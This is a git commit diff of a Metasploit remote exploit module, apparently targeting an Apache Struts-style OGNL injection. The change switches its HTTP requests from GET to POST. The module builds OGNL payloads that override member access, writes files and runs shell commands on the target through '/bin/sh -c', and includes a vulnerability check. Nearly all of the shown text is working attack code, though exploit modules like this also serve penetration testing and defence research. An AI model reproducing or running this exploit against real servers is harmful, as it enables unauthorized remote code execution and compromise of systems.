send http request (get -> post)
parent
643591546e
commit
9e56bb8358
|
@ -50,27 +50,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def send_http_request(payload)
|
||||
def send_http_request(payload, params)
|
||||
uri = normalize_uri(datastore['TARGETURI'])
|
||||
send_request_cgi(
|
||||
'uri' => uri + payload,
|
||||
'version' => '1.1',
|
||||
'method' => 'GET')
|
||||
'method' => 'POST',
|
||||
'vars_post' => params
|
||||
)
|
||||
end
|
||||
|
||||
def parameterize(params) # params is a hash
|
||||
URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
|
||||
end
|
||||
|
||||
def generate_rce_payload(code, params_hash)
|
||||
def generate_rce_payload(code)
|
||||
payload = "?method:"
|
||||
payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
|
||||
payload << ","
|
||||
payload << Rex::Text.uri_encode(code)
|
||||
payload << ","
|
||||
payload << Rex::Text.uri_encode("1?#xx:#request.toString")
|
||||
payload << "&"
|
||||
payload << parameterize(params_hash)
|
||||
payload
|
||||
end
|
||||
|
||||
|
@ -94,9 +90,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
code << "##{var_b}.close()"
|
||||
|
||||
params_hash = { var_c => filename, var_d => content }
|
||||
payload = generate_rce_payload(code, params_hash)
|
||||
payload = generate_rce_payload(code)
|
||||
|
||||
send_http_request(payload)
|
||||
send_http_request(payload, params_hash)
|
||||
end
|
||||
|
||||
def execute_command(cmd)
|
||||
|
@ -119,9 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
|
||||
params_hash = { var_f => cmd }
|
||||
payload = generate_rce_payload(code, params_hash)
|
||||
payload = generate_rce_payload(code)
|
||||
|
||||
send_http_request(payload)
|
||||
send_http_request(payload, params_hash)
|
||||
end
|
||||
|
||||
def linux_stager
|
||||
|
@ -140,6 +136,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
execute_command("/bin/sh -c #{payload_exe}")
|
||||
end
|
||||
|
||||
def windows_stager
|
||||
end
|
||||
|
||||
def java_stager
|
||||
end
|
||||
|
||||
def exploit
|
||||
case target['Platform']
|
||||
when 'linux'
|
||||
|
@ -169,9 +171,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
code << "##{var_a}.close()"
|
||||
|
||||
params_hash = { var_b => flag }
|
||||
payload = generate_rce_payload(code, params_hash)
|
||||
payload = generate_rce_payload(code)
|
||||
|
||||
resp = send_http_request(payload)
|
||||
resp = send_http_request(payload, params_hash)
|
||||
|
||||
if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
|
||||
Exploit::CheckCode::Appears
|
||||
|
|
Loading…
Reference in New Issue